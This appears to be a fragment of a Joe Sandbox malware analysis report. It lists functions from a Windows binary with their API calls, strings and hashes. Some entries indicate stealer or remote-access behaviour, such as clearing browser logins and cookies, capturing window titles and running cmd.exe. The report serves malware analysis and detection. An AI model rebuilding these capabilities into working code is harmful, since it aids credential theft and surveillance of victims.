                                              • String ID: /C $cmd.exe$open
                                              • API String ID: 587946157-3896048727
                                              • Opcode ID: 16ef31fdaf301ba362d07f058173c5de43aaddf50e1ff7222e4b3bcda840a0cd
                                              • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                              • Opcode Fuzzy Hash: 16ef31fdaf301ba362d07f058173c5de43aaddf50e1ff7222e4b3bcda840a0cd
                                              • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                              Function 0040B8A4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                              • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteDirectoryFileRemove
                                              • String ID: pth_unenc$xdF
                                              • API String ID: 3325800564-2448381268
                                              • Opcode ID: d40ba35bdc574994431a00040681681ffd5cebc2bb5ef4fca25f9a910d4daf75
                                              • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                              • Opcode Fuzzy Hash: d40ba35bdc574994431a00040681681ffd5cebc2bb5ef4fca25f9a910d4daf75
                                              • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                              Function 0040B8E7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,8)[,004752F0,?,pth_unenc), ref: 0040B8F6
                                              • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                              • TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: TerminateThread$HookUnhookWindows
                                              • String ID: pth_unenc
                                              • API String ID: 3123878439-4028850238
                                              • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                              • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                              • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                              • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                              Function 0044A084 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __alldvrm$_strrchr
                                              • String ID:
                                              • API String ID: 1036877536-0
                                              • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                              • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                              • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                              • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                              Function 00456C9A Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free
                                              • String ID:
                                              • API String ID: 269201875-0
                                              • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                              • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                              • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                              • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                              Function 00442851 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                              • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                              • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                              • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                              Function 0040C047 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • Cleared browsers logins and cookies., xrefs: 0040C130
                                              • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep
                                              • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                              • API String ID: 3472027048-1236744412
                                              • Opcode ID: 1d84a610968c0f989614364af8c032c8251bfa68e213ae620782c32fadd9a619
                                              • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                              • Opcode Fuzzy Hash: 1d84a610968c0f989614364af8c032c8251bfa68e213ae620782c32fadd9a619
                                              • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                              Function 0040A564 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C5F2
                                                • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C625
                                              • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                              • Sleep.KERNEL32(00000064), ref: 0040A638
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Window$SleepText$ForegroundLength
                                              • String ID: [ $ ]
                                              • API String ID: 3309952895-93608704
                                              • Opcode ID: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                              • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                              • Opcode Fuzzy Hash: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                              • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                              Function 0041B890 Relevance: 6.1, APIs: 4, Instructions: 63timesleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: SystemTimes$Sleep__aulldiv
                                              • String ID:
                                              • API String ID: 188215759-0
                                              • Opcode ID: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                              • Instruction ID: 634937a4cd8d43e921f59083ecd148feda9109121ee8127270144c35be039893
                                              • Opcode Fuzzy Hash: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                              • Instruction Fuzzy Hash: D01133B35043456BC304EAB5CD85DEF779CEBC4358F040A3EF64982061EE29E94986A6
                                              Function 00443AD3 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                              • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                              • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                              • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                              Function 004485E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                              • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad$ErrorLast
                                              • String ID:
                                              • API String ID: 3177248105-0
                                              • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                              • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                              • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                              • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                              Function 0041C516 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C568
                                              • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandleReadSize
                                              • String ID:
                                              • API String ID: 3919263394-0
                                              • Opcode ID: ea631e93aeae4d86132659a3c821e70bd950fb822780c369254ddbb306c6d1ec
                                              • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                              • Opcode Fuzzy Hash: ea631e93aeae4d86132659a3c821e70bd950fb822780c369254ddbb306c6d1ec
                                              • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                              Function 004398E3 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                              • _UnwindNestedFrames.LIBCMT ref: 00439911
                                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                              • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                              • String ID:
                                              • API String ID: 2633735394-0
                                              • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                              • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                              • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                              • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                              Function 0041941E Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSystemMetrics.USER32(0000004C), ref: 0041942B
                                              • GetSystemMetrics.USER32(0000004D), ref: 00419431
                                              • GetSystemMetrics.USER32(0000004E), ref: 00419437
                                              • GetSystemMetrics.USER32(0000004F), ref: 0041943D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MetricsSystem
                                              • String ID:
                                              • API String ID: 4116985748-0
                                              • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                              • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                              • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                              • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                              Function 00438FB1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                              • String ID:
                                              • API String ID: 1761009282-0
                                              • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                              • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                              • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                              • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                              Function 00442CAD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                              Download Yara Rule
                                              APIs
                                              • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorHandling__start
                                              • String ID: pow
                                              • API String ID: 3213639722-2276729525
                                              • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                              • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                              • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                              • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                              Function 0044F199 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044F03A,?,00000000), ref: 0044F20D
                                              • GetCPInfo.KERNEL32(00000000,0044F03A,?,?,?,0044F03A,?,00000000), ref: 0044F220
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CodeInfoPageValid
                                              • String ID: v%(/
                                              • API String ID: 546120528-2435473048
                                              • Opcode ID: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                              • Instruction ID: 491245c4813b68437391e3e70942b885a5b84425ef1b1be509cf98dd56c33fdc
                                              • Opcode Fuzzy Hash: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
